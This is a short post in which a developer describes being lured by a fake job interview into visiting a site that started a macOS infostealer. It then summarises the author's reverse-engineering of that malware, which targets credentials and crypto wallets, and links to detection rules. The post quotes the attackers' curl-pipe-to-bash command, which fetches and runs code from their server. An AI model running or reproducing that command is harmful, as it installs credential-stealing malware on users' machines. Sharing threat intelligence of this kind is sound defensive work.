Got targeted by a fake job interview malware attack. Reverse-engineered it instead. Full breakdown inside.
Got a Wellfound job offer from “Felix” at “HyperHives.” Looked legit. They’d read my CV, knew my stack, scheduled a real interview slot. Then they asked me to “review the product” before the call. Visiting their site triggered:
curl -s https://macos.hyperhives.net/install | nohup bash &
Didn’t enter my password. Killed the process. Spent the next several hours taking it apart.
The malware encrypted every config string using 570 unique custom functions. I emulated all of them with Unicorn and pulled out everything: C2 server, full endpoint list, a Sentry error tracking DSN that would identify the developer under legal subpoena, and 276 targeted Chrome extension IDs covering 188 crypto wallets.
Currently 9/64 on VirusTotal. CrowdStrike, Sophos, Malwarebytes all missing it.
TTP overlap with DPRK Contagious Interview is strong.
Full writeup, decryption scripts, YARA/Sigma rules, STIX bundle:
https://github.com/Darksp33d/hyperhives-macos-infostealer-analysis